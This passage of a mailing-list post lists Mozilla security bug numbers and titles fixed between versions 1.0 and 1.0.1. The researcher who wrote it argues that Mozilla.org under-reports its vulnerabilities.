cgi 125583 Browser Security Disable automatic XLinks in Mail 135267 Browser Security Reading files cross-host using styles 144228 MailNews Security Malicious email breaks POP server connection 146094 Browser Networking Stealing third-party cookies through a proxy 147754 Browser Security XMLSerializer needs same-origin check 148256 Browser XML flawfinder warnings in XML Extras 148269 NSS Libraries flawfinder warnings in mozilla/security 148520 Browser Password Manager window.prompt is returning a saved password instead of prompting. 149777 Browser Security Node cloned from external, untrusted document and appended to chrome document. 149943 Browser Security Princeton-like exploit may be possible 150339 Browser Internationalization huge font crashes X Windows 151933 Browser XML xml:base should not allow setting chrome URLs 152697 Browser Networking no limit on the size of a HTTP header 152725 Browser Cookies Possible cookie stealing using javascript: URLs 154030 Browser Security HTML directory indexer doesn't html-escape url 154240 PSM Client Libraries No warning when redirecting https-http-https at http protocol level 154930 Browser Security document.domain abused to access hosts behind firewall 155222 Browser Security Heap corruption in PNG library 157202 Browser Security Exploitable (?) heap overrun in PNG 157652 Browser JavaScript Engine Crash, possible heap corruption in JS Array.prototype.sort 157845 Browser DOM Events Crash involving document.open() 157989 Browser ImageLib Possible heap corruption with 0-width GIF 161721 Browser Installer install in onkeypress for space key bypasses warning dialog To put it shortly, I do appreciate the efforts put forth by the Mozilla.org team, I just wish they could be more communicative instead of hiding the fact that Mozilla, like most any other software product, has had and will have a long number of security vulnerabilities. Undoubtedly, this gives a different view on the security of Mozilla than one would get by reading the official list of vulnerabilities (listing just 1 vulnerability). Again, the above was just an incomplete list of security issues that were fixed between the minor version change 1.0 to 1.0.1, I have no idea about the amount of issues that remain or that has been fixed so far. Regards Thor Larholm, Security Researcher PivX Solutions, LLC Are You Secure? http://www.PivX.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html